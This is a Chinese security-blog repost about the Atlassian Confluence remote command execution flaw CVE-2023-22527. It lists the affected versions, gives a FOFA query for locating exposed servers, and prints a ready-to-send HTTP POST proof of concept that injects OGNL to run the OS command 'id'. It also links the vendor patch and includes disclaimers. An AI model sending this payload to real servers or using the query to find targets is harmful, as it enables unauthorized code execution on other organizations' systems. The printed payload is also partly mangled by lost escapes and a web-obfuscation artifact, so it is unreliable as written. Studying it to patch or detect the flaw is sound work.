Atlassian Confluence 远程命令执行漏洞(CVE-2023-22527)

admin 2024年1月24日14:47:25评论35 views字数 1446阅读4分49秒阅读模式

,

免责声明:文章中内容来源于互联网,涉及的所有内容仅供安全研究与教学之用,读者将其信息做其他用途而造成的任何直接或者间接的后果及损失由用户承担全部法律及连带责任文章作者不承担任何法律及连带责任!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。

0x00.产品介绍

Atlassian Confuence是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。是面向大型企业和组织的高可用性、可扩展性和高性能版本。

Atlassian Confluence 远程命令执行漏洞(CVE-2023-22527)

0x01.影响范围

Confluence Data Center and Server 8.0.x Confluence Data Center and Server 8.1.x Confluence Data Center and Server 8.2.x Confluence Data Center and Server 8.3.x Confluence Data Center and Server 8.4.x 8.5.0 <= Confluence Data Center and Server <= 8.5.3

0x02.漏洞复现

FOFA

app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"

Atlassian Confluence 远程命令执行漏洞(CVE-2023-22527)

POC 

POST /template/aui/text-inline.vm HTTP/1.1Host: your-ipAccept-Encoding: gzip, deflate, brAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencodedlabel=u0027%2b#requestu005bu0027.KEY_velocity.struts2.contextu0027u005d.internalGet(u0027ognlu0027).findValue(#parameters.x,{})%2bu0027&[email protected]@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

Atlassian Confluence 远程命令执行漏洞(CVE-2023-22527)

0x03.修复建议

厂商已提供漏洞修补方案,请关注厂商主页及时更新

https://confluence.atlassian.com/pages/viewpage.action?pageId=1333335615

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

遵守网络安全法,请勿用于非法入侵,仅供学习

原文始发于微信公众号(深白网安):Atlassian Confluence 远程命令执行漏洞(CVE-2023-22527)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月24日14:47:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Atlassian Confluence 远程命令执行漏洞(CVE-2023-22527)https://cn-sec.com/archives/2425981.html

发表评论

匿名网友 填写信息